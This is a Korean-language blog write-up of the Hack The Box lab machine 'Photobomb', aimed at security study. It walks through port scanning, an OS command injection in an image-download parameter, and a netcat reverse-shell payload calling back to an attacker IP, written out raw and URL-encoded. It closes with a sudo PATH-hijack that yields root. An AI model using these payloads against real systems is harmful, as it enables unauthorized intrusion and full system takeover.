Kang MyoungSeok

Kang MyoungSeok

Blog for Studying
Computer Science Engineering
and Cyber Security

[Hack The Box] Photobomb ํ’€์ด

1 ๋ถ„ ์†Œ์š”

๐Ÿ’ก Hack-The-Box Photobomb ํ’€์ด ์ž…๋‹ˆ๋‹ค.

๋ฌธ์ œ

image

Enumeration

โ”Œโ”€โ”€(rootใ‰ฟkali)-[/home/kali/Desktop]
โ””โ”€ nmap -sV -p - -vv --min-rate 3000 10.129.228.60
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-19 03:09 EST
Discovered open port 22/tcp on 10.129.228.60
Discovered open port 80/tcp on 10.129.228.60
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 42.79 seconds
           Raw packets sent: 86968 (3.827MB) | Rcvd: 80330 (3.213MB)

HTTP

image

์†Œ์Šค์ฝ”๋“œ๋ฅผ ํ™•์ธํ•ด๋ด…๋‹ˆ๋‹ค.

image

photobomb.js ์Šคํฌ๋ฆฝํŠธ ํŒŒ์ผ์„ ์‚ดํŽด๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์ด id,pw๋ฅผ ์•Œ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

image

ํ•ด๋‹น ์‚ฌ์ดํŠธ๋Š” ์ด๋ฏธ์ง€๋ฅผ ๋‹ค์šด๋กœ๋“œ ํ•˜๋Š” ๊ธฐ๋Šฅ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค.

image

์ด๋ฏธ์ง€๋ฅผ ๋‹ค์šด๋กœ๋“œ ํ•˜๊ธฐ ์œ„ํ•ด ์„œ๋ฒ„๋กœ ๋ณด๋‚ด์ง€๋Š” ๋งค๊ฐœ๋ณ€์ˆ˜๋“ค์„ ์กฐ์ž‘ํ•˜๊ธฐ ์œ„ํ•ด์„œ burpsuite๋กœ ํŒจํ‚ท์„ ์žก์Šต๋‹ˆ๋‹ค.

image

ํŒŒ์ผ์˜ ์ด๋ฆ„(photo), ํ™•์žฅ์ž(jpg), ํ•ด์ƒ๋„(dimensions)๋ฅผ ์‚ฌ์šฉ์ž์˜ ์ž…๋ ฅ๊ฐ’์„ ํ†ตํ•ด์„œ ์ฒ˜๋ฆฌํ•ฉ๋‹ˆ๋‹ค.

ํŒŒ์ผ ๋‹ค์šด๋กœ๋“œ ์ทจ์•ฝ์ ์ด๋‚˜, ํ™•์žฅ์ž๋ฅผ ๋ณ€ํ™˜ํ•ด์ฃผ๋Š” ๊ธฐ๋Šฅ์ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์— OS Command Injection ์ทจ์•ฝ์ ์ด ์กด์žฌํ•˜๋Š”์ง€ ํ™•์ธํ•ด ๋ด…๋‹ˆ๋‹ค.

filetype๋ถ€๋ถ„์—์„œ OS Command Injection ์ทจ์•ฝ์ ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค.

filetype๊ฐ’์„ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์ž…๋ ฅํ•˜์—ฌ reverse shell์„ ํš๋“ํ•ฉ๋‹ˆ๋‹ค.

# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 1234 >/tmp/f
filetype=jpg;rm+%2ftmp%2ff%3bmkfifo+%2ftmp%2ff%3bcat+%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.14.7+1234+%3e%2ftmp%2ff

image

Privilege Escalation

image

(root) : root ๊ถŒํ•œ์œผ๋กœ ์‹คํ–‰ ๊ฐ€๋Šฅ
SETENV : sudo ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰ํ•˜๋ฉด์„œ ํ™˜๊ฒฝ๋ณ€์ˆ˜๋ฅผ ์ˆ˜์ •๊ฐ€๋Šฅ
NOPASSWD : sudo ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰ํ• ๋•Œ, ํ•ด๋‹น ๊ณ„์ •์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•„์š” x
/opt/cleanup.sh : ํ•ด๋‹น ํŒŒ์ผ์„ sudo ๋ช…๋ น์–ด๋กœ ์ˆ˜ํ–‰๊ฐ€๋Šฅ

/opt/cleanup.sh ํŒŒ์ผ์„ ํ™•์ธํ•ด ๋ด…๋‹ˆ๋‹ค.

wizard@photobomb:~/photobomb$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

root ๊ถŒํ•œ์œผ๋กœ ์œ„์˜ ์‰˜ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์ˆ˜ํ–‰ํ•ฉ๋‹ˆ๋‹ค. ํ™˜๊ฒฝ๋ณ€์ˆ˜๋ฅผ ๋ฐ”๊ฟ€ ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— PATHํ™˜๊ฒฝ๋ณ€์ˆ˜๋ฅผ ์กฐ์ž‘ํ•˜์—ฌ, find ๋ช…๋ น์–ด๋ฅผ bash๋กœ ๋ฐ”๊พธ์–ด ์ฃผ๋ฉด root ๊ถŒํ•œ ํš๋“์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

cd /tmp
echo "bash" > find
chmod 777 find
sudo -u root PATH=/tmp:$PATH /opt/cleanup.sh

image

๋Œ“๊ธ€๋‚จ๊ธฐ๊ธฐ

์ฐธ๊ณ 

[DiceCTF] Writeup

9 ๋ถ„ ์†Œ์š”

๐Ÿ’ก DiceCTF 2023 Writeup ์ž…๋‹ˆ๋‹ค.